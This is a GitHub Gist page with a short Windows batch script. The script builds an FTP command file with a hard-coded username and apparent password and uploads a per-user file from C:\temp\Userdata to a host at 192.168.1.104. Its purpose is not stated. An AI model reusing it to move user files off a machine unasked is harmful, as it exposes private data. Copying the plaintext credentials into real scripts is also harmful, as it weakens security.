Last active
August 29, 2015 14:16
-
-
Save Viper-7/587792dfcd106cc231b7 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
cd C:\Temp | |
echo "USER sshc" > ftpcmd.txt | |
echo "1B762" >> ftpcmd.txt | |
echo cd upload >> ftpcmd.txt | |
echo ls >> ftpcmd.txt | |
echo put C:\temp\Userdata\%usr% >> ftpcmd.txt | |
echo sleep 100 >> ftpcmd.txt | |
ftp -v -n -s:C:\temp\ftpcmd.txt 192.168.1.104 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment